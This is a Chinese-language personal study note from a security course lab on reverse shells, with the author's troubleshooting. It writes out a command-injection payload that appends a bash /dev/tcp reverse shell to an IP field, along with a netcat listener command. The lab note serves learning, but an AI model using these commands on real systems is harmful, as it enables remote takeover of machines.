前言：小迪安全2022第一节反弹shell，小迪用的是两台都是云服务器，没有服务器可以在自己的主机上搭建也是可以的，主机上搭两个网站

思路：生成一个木马文件，下载到本机，然后利用本机上传到目标主机，执行反弹命令。

但是现在这个可以用bash反弹，在centos里面

正题：

在棱角社区，找到反弹shell

这个是写在被攻击机上的，写了这个就会将目标的控制台，返回到以下
bash -i >& /dev/tcp/127.0.0.1/8080 0>&1（错误）

127.0.0.1 & bash -i >& /dev/tcp/192.168.1.150/9999 0>&1（正确）

然后在攻击机上监听上这个端口，监听本地端口的8080

nc64.exe -lvvp 9999                //注意加地址好像会监听失败

做的过程中的问题

在本地监听9999端口，然后在被攻击机上发送对方的控制台给我的本机，

但是结果失败了。

127.0.0.1 & bash -i >& /dev/tcp/192.168.1.150/9999 0>&1（正确）

bash -i >& /dev/tcp/127.0.0.1/8080 0>&1（错误）（棱角社区有毒）